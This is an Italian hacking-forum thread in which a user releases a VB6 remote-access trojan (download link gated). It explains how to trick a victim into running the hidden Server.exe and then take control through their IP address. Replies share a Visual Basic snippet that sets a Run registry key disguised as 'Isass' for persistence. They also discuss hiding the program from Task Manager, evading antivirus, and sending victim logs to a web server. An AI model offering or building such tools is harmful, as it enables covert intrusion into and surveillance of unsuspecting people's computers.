• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Release Trojan by Me

industriale

Utente Assiduo
Autore del topic
8 Luglio 2008
750
57
Miglior risposta
0
Inizio con il dire che non mi assumo responsabilità di alcun genere.

Allora, vi presento il mio primo Trojan Server - Client sviluppato in l'ambiente VB6.

Vi posto qualche screen:

qweqweqweq.png


Ecco il funzionamento:

Dovete inviare alla vittima il Server.exe e gli dite di aprirlo. Adesso viene il bello: il form Server.exe non è visibile e non è tanto meno Abilitato quindi non può essere visualizzato. Comunque, una volta inviato, voi dovete aprire il client (non vi preoccupate il client non è rischioso) e dovete inserire l'IP della vittima e connettervi, una volta fatto questo, fate quello che volete :P

Ecco il Download:
Perfavore, Entra oppure Registrati per vedere i Link!


E la scansione:
Perfavore, Entra oppure Registrati per vedere i Link!

Naturalmente rileva che è un trojan, comunque non vi preoccupate...il trojan l'avrà solo la vittima che apre il server...


Spero di essere stato chiaro... Ciao Ciao
 
Ultima modifica:
Più che trojan lo chiamerei giochino.
Un trojan secondo me dovrebbe fare tutto da solo, come programmato, non deve essere comandato da un client.
 
Beh sto progettando proprio ora un trojan che si attiva automaticamente e che periodicamente fa qualcosa.....xdxdxd
 
Per me è stato leggermente faticoso....cmq grz per i complimenti....
Ah dimenticavo....chi sa il codice per fare si che un programma in vb si metta nell'esecuzione automatica?
 
Bravo industriale!
1) Se la vittima ha un IP dinamico non funge
2) Apprezzo l'impegno bravo :emoji_smiley:
Inferno io so come farlo funzionare anche con IP dinamico!
--------------- AGGIUNTA AL POST ---------------
Per me è stato leggermente faticoso....cmq grz per i complimenti....
Ah dimenticavo....chi sa il codice per fare si che un programma in vb si metta nell'esecuzione automatica?



Codice:
Perfavore, Entra oppure Registrati per vedere i codici!
 
Ultima modifica:
Set reg = CreateObject("Wscript.shell")
reg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\Isass", App.Path & "\NOMEPROG.exe

cmq l'hai messo invisibile al task manager?
 
Industriale se puoi mi invieresti le source e un piccola guida perchè vorrei studiare il VB6 (so le cose basi) partendo da queste cose ti ringrazio

50 cent roby
 
Si potrebbe fare un trojan come dici tu ketto...
Sarebbe anche meno trovabile dagli anti-virus in più volendo si può fare un LOG su sito internet trammite get (php) & web browser (vb6)